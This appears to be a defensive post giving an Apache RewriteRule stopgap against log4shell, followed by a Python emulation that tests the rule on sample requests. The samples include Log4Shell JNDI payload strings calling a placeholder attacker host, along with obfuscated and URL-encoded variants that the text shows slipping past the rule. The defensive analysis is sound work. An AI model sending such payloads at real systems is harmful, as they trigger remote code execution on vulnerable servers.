Apache RewriteRule Mitigation for log4shell

Yes, you should update ASAP to a patched version of Log4J.

You should also consider other ways you can be exploited: the web tier is not the only input. Any Java process that logs attacker-supplied strings is a target, so ask whether you have Java processing incoming email, message queues or uploaded files as well.

But layers of security never hurt, so you can also try this:

# Needs mod_rewrite; goes in the vhost (or .htaccess if AllowOverride permits it)
RewriteEngine On
# CondPattern is a PCRE regex: \$ is a literal dollar, { is literal here
RewriteCond %{THE_REQUEST}     \${     [OR]
RewriteCond %{REQUEST_URI}     \${     [OR]
RewriteCond %{QUERY_STRING}    \${     [OR]
RewriteCond %{HTTP_USER_AGENT} \${     [OR]
RewriteCond %{HTTP_REFERER}    \${
# Any condition true: stop processing and answer 403 (R= with a non-3xx code drops the substitution)
RewriteRule .*                 -       [L,R=403]

Of course, if you legitimately expect ${ in any of these fields, this will break your site. In that case narrow the rule rather than dropping it, for example by adding a RewriteCond so it only fires on requests that lack your site's session or tracking cookie, leaving logged-in users untouched.

Note also that these conditions are evaluated on every single request, static files included; if that matters, add a RewriteCond on REQUEST_URI to scope the rule to the paths that reach Java. Be clear about what it does not cover, too: only the User-Agent and Referer headers are inspected, so a payload in any other header (X-Forwarded-For, X-Api-Version, Authorization and so on) sails through, and QUERY_STRING and THE_REQUEST are matched in raw form, so a URL-encoded %24%7B in the query string is not seen as ${ (the path is URL-decoded before mod_rewrite sees it, so REQUEST_URI does catch the encoded form there). Treat it as a speed bump in front of the real fix, not as the fix.
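To see exactly what the rule above does and does not catch, here is an added Python emulation of the five RewriteCond checks run over a handful of constructed sample requests. It is not code from the original post. The modelling of mod_rewrite's variables (THE_REQUEST and QUERY_STRING seen raw, REQUEST_URI after URL decoding) is an assumption stated in the comments, the placeholder host attacker.example and the header names in the samples are constructed, and the hardened_blocks variant is this example's own extension rather than anything the page proposes.

```python
"""Emulate the page's Apache rule and show its blind spots on sample requests."""
import re
from urllib.parse import quote, unquote

# Same CondPattern as the RewriteCond lines: a literal "${".
COND_PATTERN = re.compile(r"\$\{")


def rewrite_variables(request_line, headers):
    """Build the five mod_rewrite variables the page's rule inspects.

    Modelling assumption (not from the page): THE_REQUEST and QUERY_STRING are
    the raw, still URL-encoded text from the wire; REQUEST_URI is the path
    component after Apache has URL-decoded it; header values are raw.
    """
    _method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    return {
        "THE_REQUEST": request_line,
        "REQUEST_URI": unquote(path),
        "QUERY_STRING": query,
        "HTTP_USER_AGENT": headers.get("User-Agent", ""),
        "HTTP_REFERER": headers.get("Referer", ""),
    }


def rule_blocks(request_line, headers):
    """True when the page's rule would answer 403: any of the five fields matches."""
    variables = rewrite_variables(request_line, headers)
    return any(COND_PATTERN.search(value) for value in variables.values())


def hardened_blocks(request_line, headers):
    """Extension, not on the page: also URL-decode each field and scan every header.

    Closes the two gaps the samples below expose (encoded query string, other
    headers) at the cost of more false positives on sites carrying "${" somewhere.
    """
    fields = list(rewrite_variables(request_line, headers).values()) + list(headers.values())
    return any(COND_PATTERN.search(v) or COND_PATTERN.search(unquote(v)) for v in fields)


# Constructed samples; attacker.example is a placeholder host, not a real target.
JNDI = "${jndi:ldap://attacker.example/a}"
ENCODED_JNDI = quote(JNDI, safe="")  # "%24%7Bjndi%3Aldap%3A%2F%2F..."
BASE_HEADERS = {"Host": "www.example.com", "User-Agent": "Mozilla/5.0"}

SAMPLES = {
    "benign": ("GET /index.html?q=hello HTTP/1.1", dict(BASE_HEADERS)),
    "ua_plain": ("GET / HTTP/1.1", {**BASE_HEADERS, "User-Agent": JNDI}),
    # Nested-lookup obfuscation still contains a literal "${", so the rule catches it.
    "ua_obfuscated": ("GET / HTTP/1.1",
                      {**BASE_HEADERS, "User-Agent": "${${lower:j}ndi:ldap://attacker.example/a}"}),
    # Encoded payload in the path: REQUEST_URI is decoded, so the rule catches it.
    "path_encoded": ("GET /" + ENCODED_JNDI + " HTTP/1.1", dict(BASE_HEADERS)),
    # Encoded payload in the query string: QUERY_STRING and THE_REQUEST are raw, no match.
    "query_encoded": ("GET /search?q=" + ENCODED_JNDI + " HTTP/1.1", dict(BASE_HEADERS)),
    # A header the rule never looks at.
    "other_header": ("GET / HTTP/1.1", {**BASE_HEADERS, "X-Api-Version": JNDI}),
}


def evaluate_samples():
    """Return {name: (blocked_by_page_rule, blocked_by_hardened_variant)}."""
    return {name: (rule_blocks(*req), hardened_blocks(*req)) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (page_rule, hardened) in evaluate_samples().items():
        print(f"{name:15} page rule: {'403' if page_rule else 'pass':4}  hardened: {'403' if hardened else 'pass'}")
```

Running it shows the obfuscated User-Agent and the encoded path are both stopped by the rule as written, while the encoded query string and the X-Api-Version header are not; whether hardened_blocks is acceptable on your site depends on how much legitimate traffic carries "${" in some header.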
